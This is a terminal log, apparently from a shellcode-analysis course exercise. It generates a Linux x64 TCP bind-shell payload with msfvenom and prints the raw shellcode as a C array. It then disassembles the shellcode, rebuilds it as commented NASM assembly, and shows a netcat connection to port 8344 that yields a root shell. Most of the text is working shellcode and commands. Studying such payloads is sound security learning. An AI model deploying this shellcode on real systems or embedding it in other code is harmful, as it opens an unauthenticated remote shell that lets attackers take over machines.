===
root@kali32:/opt/payload# msfvenom -p linux/x64/shell_bind_tcp lport=8344 --platform linux -f c
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 86 bytes
Final size of c file: 386 bytes
unsigned char buf[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
"\xc7\x04\x24\x02\x00\x20\x98\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";

===

root@kali32:/opt/payload#  msfvenom -p linux/x64/shell_bind_tcp lport=8344 --platform linux -f elf -o bind64
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 86 bytes
Final size of elf file: 206 bytes
Saved as: bind64

== Extracted shellcode from objdump

0000000000201060 <code>:
  201060:       6a 29                   push   0x29
  201062:       58                      pop    rax
  201063:       99                      cdq
  201064:       6a 02                   push   0x2
  201066:       5f                      pop    rdi
  201067:       6a 01                   push   0x1
  201069:       5e                      pop    rsi
  20106a:       0f 05                   syscall
  20106c:       48 97                   xchg   rdi,rax
  20106e:       52                      push   rdx
  20106f:       c7 04 24 02 00 20 98    mov    DWORD PTR [rsp],0x98200002
  201076:       48 89 e6                mov    rsi,rsp
  201079:       6a 10                   push   0x10
  20107b:       5a                      pop    rdx
  20107c:       6a 31                   push   0x31
  20107e:       58                      pop    rax
  20107f:       0f 05                   syscall
  201081:       6a 32                   push   0x32
  201083:       58                      pop    rax
  201084:       0f 05                   syscall
  201086:       48 31 f6                xor    rsi,rsi
  201089:       6a 2b                   push   0x2b
  20108b:       58                      pop    rax
  20108c:       0f 05                   syscall
  20108e:       48 97                   xchg   rdi,rax
  201090:       6a 03                   push   0x3
  201092:       5e                      pop    rsi
  201093:       48 ff ce                dec    rsi
  201096:       6a 21                   push   0x21
  201098:       58                      pop    rax
  201099:       0f 05                   syscall
  20109b:       75 f6                   jne    201093 <code+0x33>
  20109d:       6a 3b                   push   0x3b
  20109f:       58                      pop    rax
  2010a0:       99                      cdq
  2010a1:       48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f6e69622f
  2010a8:       73 68 00
  2010ab:       53                      push   rbx
  2010ac:       48 89 e7                mov    rdi,rsp
  2010af:       52                      push   rdx
  2010b0:       57                      push   rdi
  2010b1:       48 89 e6                mov    rsi,rsp
  2010b4:       0f 05                   syscall


== Reconstructed asm code

root@kali:/opt/slae/shellcode_anlyz/bindshell# cat bind.nasm
global _start

section .text

_start:

socket:

        push   0x29
        pop    rax
        cdq
        push   0x2
        pop    rdi
        push   0x1
        pop    rsi
        syscall

sock_struct:

        xchg   rdi,rax
        push   rdx
        mov    DWORD [rsp],0x98200002  ; port 8344
        mov    rsi,rsp
        push   0x10
        pop    rdx

Port_Bind:

        push   0x31
        pop    rax
        syscall

Server_Listen:

        push   0x32
        pop    rax
        syscall

client_accept:

        xor    rsi,rsi
        push   0x2b
        pop    rax
        syscall

        xchg   rdi,rax
        push   0x3
        pop    rsi

dup2:

        dec    rsi
        push   0x21
        pop    rax
        syscall
        jne    dup2

Execve:

        push   0x3b
        pop    rax
        cdq
        mov rbx,0x68732f6e69622f
        push   rbx
        mov    rdi,rsp
        push   rdx
        push   rdi
        mov    rsi,rsp
        syscall
root@kali:/opt/slae/shellcode_anlyz/bindshell#

===============================
root@kali:/opt/slae/shellcode_anlyz/bindshell# ./bind

==
root@kali:/opt/slae/code/Execve-JCP# nc -nv 127.0.0.1 8344
(UNKNOWN) [127.0.0.1] 8344 (?) open
id
uid=0(root) gid=0(root) groups=0(root)
w
 12:28:19 up  3:34,  2 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    192.168.244.1    08:55   25.00s  1.51s  0.00s w
root     pts/1    192.168.244.1    08:55    2.00s  0.50s  0.00s nc -nv 127.0.0.1 8344
===
